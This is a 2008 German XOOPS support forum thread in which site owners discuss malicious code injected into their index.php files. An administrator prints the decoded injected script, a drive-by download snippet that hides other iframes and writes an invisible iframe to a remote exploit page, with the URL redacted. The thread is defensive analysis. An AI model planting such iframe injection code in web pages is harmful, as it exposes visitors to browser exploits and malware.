MyXoops Forum

Re: Fremder Code in der index.php [Sicherheit von XOOPS] - myXOOPS German Support

alfred

Administrator
Gepostet am:17.07.2008 22:03
alfred
alfred Offline (Show more)
Administrator
Posts: 7618
Since: 06.12.2004
#23

Re: Fremder Code in der index.php

so und nun brauchst du nur mal nachzuschauen, wer als letzter was hochgeladen hat, bevor das auftrat, dann weisste auch woher der kommt
(nämlich von einem infizierten Rechner)

Der_Lord

"myXOOPs"-Fortgeschrittener
Gepostet am:17.07.2008 22:02
Der_Lord
Der_Lord Offline (Show more)
"myXOOPs"-Fortgeschrittener
Posts: 155
Since: 22.09.2006
#22

Re: Fremder Code in der index.php

Schön, jetzt kennen wir ihn mit Namen

Advertisement

Gepostet am:0
Advertisement (Show more)
Posts: 0
Since: 0


Hier könnten Sie Ihre Anzeige aufgeben!
Bitte kontaktieren Sie uns, um mehr darüber zu erfahren.

alfred

Administrator
Gepostet am:17.07.2008 21:55
alfred
alfred Offline (Show more)
Administrator
Posts: 7618
Since: 06.12.2004
#21

Re: Fremder Code in der index.php

so wir kommen der Sache schon mal näher
Der Virus : Trojan.IFrame.BI

Der_Lord

"myXOOPs"-Fortgeschrittener
Gepostet am:17.07.2008 21:41
Der_Lord
Der_Lord Offline (Show more)
"myXOOPs"-Fortgeschrittener
Posts: 155
Since: 22.09.2006
#20

Re: Fremder Code in der index.php

Ich will ja nicht sagen das ich etwas beunruhigt bin - aber das bin ich. Jetzt schon die zweite Meldung von 2.2 mit Protector und diesem Mist in den Dateien. Wo ist das Loch? Das ist die Preisfrage.

alfred

Administrator
Gepostet am:17.07.2008 21:32
alfred
alfred Offline (Show more)
Administrator
Posts: 7618
Since: 06.12.2004
#19

Re: Fremder Code in der index.php

der scriptfehler ist gewollt, damit man nicht merkt das ein unsichtbarere
IFrame geladen wird

Wens interessiert hier der decodierte Code:

<script>function check_content(){
  var 
i=0;
  while(
document.getElementsByTagName('iframe').length){
    var 
el=document.getElementsByTagName('iframe')[i];
    if( (
el.style.display=='none' || el.style.visibility =='hidden' || (el.width<&& el.height<5)) && el.name!='c4')
{
el.parentNode.removeChild(el);
    }else 
     
i++;}
    }
   
check_content();
   if(!
myia){
   
document.write(<iframe name=c4 src='http://###########/in.cgi?15&xu=1&'+Math.round(Math.random()*241527)+'e8a829e7dfd' width=563 height=429 style='display: none'></iframe>
   );
   }
  var 
myia=true;
</
script>


Die URL habe ich unschädlich gemacht, da diese immer noch aktiv ist !

berliner

"myXOOPs"-Neuling
Gepostet am:17.07.2008 21:31
berliner
berliner Offline (Show more)
"myXOOPs"-Neuling
Posts: 1
Since: 17.07.2008
#18

Re: Fremder Code in der index.php

Hallo,

ich hatte seit gestern das selbe Problem und zwar dass fast alle mein index.html und mein index.php mit einem fremden code verseucht.
Es wird mich gern interssieren wie könnte den Code eingefügt werden damit ich das Problem wieder auftaucht.
xoops version 2.2
ich habe schon protector 3.17 und habe auch ein htacces..

schöne Grüsse

Der_Lord

"myXOOPs"-Fortgeschrittener
Gepostet am:17.07.2008 21:27
Der_Lord
Der_Lord Offline (Show more)
"myXOOPs"-Fortgeschrittener
Posts: 155
Since: 22.09.2006
#17

Re: Fremder Code in der index.php

Gut erkannt. Nur so konnte ich den Skriptfehler dem eingeschleusten Code zuordnen

Hast du die Logfiles schon durchgesehen?

chris47803

"myXOOPs"-Könner
Gepostet am:17.07.2008 21:24
chris47803
chris47803 Offline (Show more)
"myXOOPs"-Könner
Posts: 283
Since: 10.10.2006
#16

Re: Fremder Code in der index.php

Wieso Scriptfehler?

Der Fremdcode ist doch schon lange aus meiner
Index.php raus.

Chris

Der_Lord

"myXOOPs"-Fortgeschrittener
Gepostet am:17.07.2008 21:17
Der_Lord
Der_Lord Offline (Show more)
"myXOOPs"-Fortgeschrittener
Posts: 155
Since: 22.09.2006
#15

Re: Fremder Code in der index.php

Da mache ich mir eigentlich keine Sorgen. Bis jetzt hat McAfee VirusScan Enterprise noch alles abgefangen. Aber du hast schon recht, man soll sein Glück nicht zu sehr strapazieren.

alfred

Administrator
Gepostet am:17.07.2008 21:13
alfred
alfred Offline (Show more)
Administrator
Posts: 7618
Since: 06.12.2004
#14

Re: Fremder Code in der index.php

Zitat:

Der_Lord schrieb:
Zitat:

alfred schrieb:
Kann er auch nicht


Warum nicht? Ist die Malware so clever? Oder war sie nicht funktionsfähig? IE meldete bei mir nur einen Skriptfehler.


nicht funktionsfähig, ansonsten hättest du deinen Rechner neu aufsetzen können
Versucht wurde einen exploid einzuschleusen, also nicht unbedingt das im IE ausprobieren, weil garantieren, das nix passiert, kann ich natürlich nicht
(FF und Opera gehen da besser mit um)
Diesen Thread durchsuchen:  1 Anonyme Benutzer

Aktuell aus dem Forum

Forum Thema Antworten Views Letzter Beitrag
OffOffTopic [Wichtig] Übernahme myXOOPS 0 494 11.12.2023 18:57
alfred Gehe zum letzten Beitrag
Die Installation und Administration von XOOPS 2.5.X [Offen] Upgrade 2.5.11 3 2207 07.05.2023 07:03
Goffy Gehe zum letzten Beitrag